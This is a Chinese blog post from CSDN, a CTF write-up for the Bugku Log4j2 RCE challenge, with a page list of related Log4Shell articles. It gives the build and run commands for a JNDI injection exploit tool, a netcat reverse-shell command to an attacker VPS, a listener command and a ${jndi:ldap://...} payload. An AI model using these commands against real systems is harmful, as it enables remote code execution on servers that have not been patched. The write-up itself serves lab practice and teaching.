bugku---Apache Log4j2 RCE

最新推荐文章于 2024-04-30 11:47:52 发布
最新推荐文章于 2024-04-30 11:47:52 发布
阅读量4.5k 收藏 7
点赞数 5
分类专栏: CTF-WP 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43895765/article/details/121943381
版权

1.bugku---Apache Log4j2 RCE

1.1 打开题目

注意:描述中的命令后面跟的×说明不支持这个命令,√则代表可以使用

1.2 构建一个JNDI服务

Github: https://github.com/welk1n/JNDI-Injection-Exploit

1.2.1 构建

1.cd JNDI-Injection-Exploit
2.mvn clean package -DskipTests
3.java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "命令" -A "VPS_IP"

1.3 运行JNDI服务

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc [vps_ip] [vps_port] -e /bin/sh" -A [vps_ip]

vps_ip : 你的服务器ip
vps_port : 监听的端口,用来接收反弹的shell

1.3.1payload

payload构造不需要经过base64编码,直接用nc xxx.xxx.xxx.xxx port -e /bin/sh即可,把-e /bin/sh放在最后面,题目描述中的×说明了不能使用,但是可以使用/bin/sh

1.4 启动一个nc监听

nc -lvp 1234

1.5 ATTACK

选择下图中任意一条"JNDI Links"(即粉红色字体的url)

${jndi:[攻击payload]}
比如: ${jndi:ldap://xxx.xxx.xxx.xxx:1389/zlfd1h}

1.6 反弹shell

获取flag

submit flag

更多log4j的漏洞信息见 :http://vfree.ltd/index.php/archives/379.html
更多文章见个人博客: http://vfree.ltd/
博主自建ctf平台:http://ctf.vfree.ltd/

v.FREE
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
springboot启动报错
aaaaaaaaaaaaam的博客
06-26 246
Log4j2 could not find a logging implementation 添加maven依赖 org.apache.logging.log4j log4j-core 2.10.0 org.apache.logging.log4j log4j-api 2.10.0
[WEB攻防]Apache log4j2 远程代码漏洞(CVE-2021-44228)安鸾靶场复现 +学习过程
AAAAAAAAAAAA66的博客
01-25 1982
中华人民共和国网络安全法(出版物)_360百科 其实搭建好环境,再利用其实很快能复现,但对我来说就是配置各种环境(java ldap 防火墙……)麻烦,另外在网上也没找到write up ,所以只能找一些相关的来学习,虽然走了不少弯路,但也学到不少相关的技巧与知识。 目录 漏洞原理 复现过程 检测 利用 防御方法 总结 漏洞原理 官方: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。...
Apache Log4j2 RCE漏洞利用反弹shell合集
yy
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4318
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 769
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞。
bugku web-Apache Log4j2 RCE
weixin_46578840的博客
01-29 2957
一,准备环境 有VPS即可 二,题解 1,根据提示,/bin/bash:x,带x的是无法执行的(包括base64编码),打勾的是可以执行的 2,注意 首先VPS上要装有java环境和工具,这里我用的是JNDIExploit-1.2-SNAPSHOT.jar 2.2 vps先允许反弹shell用到的端口2.3,再启动工具 2.4,再开一个窗口监听nc 2.5,构造payload,根据提示进行利用 将地址改为自己的vps地址,然后将加密后的命令放到末尾 原:${jndi:ldap://x.x.x.x:1389
Bugku WEB Apache Log4j2 RCE
qq_41696858的博客
12-13 1928
bugku最近上新了一题log4j2的题,紧跟时代,刷一刷 先简单说一下这个漏洞的原理吧,本质是JNDI注入 需要说的是,这题需要弹VPS,也就是你得有公网IP 通过构造形如${jndi:ldap:}或者${jndi:rmi}之类的恶意payload,可以造成任意命令执行漏洞 防护的常用思路:更新apache2 log4j2版本到2.15以上 一般来说可能造成此漏洞的API包括但不限于logger.info(),logger.error() 具体的调用链可以看这篇https://www.anquanke.c
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
log4j2-rce靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。...
log4j-rce-payload
04-15
经测试验证可用lport1389,userip是攻击ip即payload存放地,webport攻击机闲置可访问的web端口,执行成功反弹即显示Send LDAP reference result for a redirecting to http://xxx:xx/Exploit.class ...
Apache Log4j2 RCE.md
07-09
Apache Log4j2 RCE
Apache_Log4j2_RCE漏洞复现
Nailaoyyds的博客
04-24 4247
漏洞描述: Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 利用bugku中的题来
【漏洞复现】Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 850
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
CTF刷题网站汇总(包括本地可以自己搭建的)(1)
qq_51550750的博客
01-29 1万+
CTF刷题网站汇总(包括本地可以自己搭建的) CTF刷题平台汇总(欢迎各位师傅们补充) 第一个当然是CTFshow啦!https://ctf.show/ 攻防世界 https://adworld.xctf.org.cn/ Bugku https://ctf.bugku.com/ 论剑场 https://new.bugku.com/ Buuctf https://buuoj.cn/ Jarvisoj https://www.jarvisoj.com/ 墨者学院 https://www.mozhe.cn/ 看雪
Apache Log4j2 远程代码执行高危漏洞 解决方案
石宗昊的博客
12-10 1万+
Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊 配置,经阿里云安全团队验证 Apache Struts2、 Apache Solr. Apache Druid、 Apache Flink等均受影响。阿里云应急响应中心提醒Apache Log4j2 用户尽快采取安全措施阻止
Apache Log4j2 RCE 命令执行漏洞预警及修复方案
HBohan的博客
12-12 1557
漏洞名称:Apache Log4j2远程代码执行漏洞 组件名称:Apache Log4j2 截止2021年12⽉10⽇,受影响的Apache log4j2版本: 2.0≤Apache Log4j<=2.15.0-rc1 漏洞类型:远程代码执行
spring boot 基础案例【3】构建RESTful API与单元测试
最新发布
weixin_39818813的博客
04-30 1008
教程1教程2进入正文。
bugku apache log4j2 rce
03-16
bugku apache log4j2 rce是指一个漏洞,可以通过Apache Log4j2库中的一个特定功能,实现远程代码执行(RCE)攻击。该漏洞可能会导致攻击者获取系统权限,进而对受害者进行攻击和控制。建议用户及时升级相关软件版本,以避免受到攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值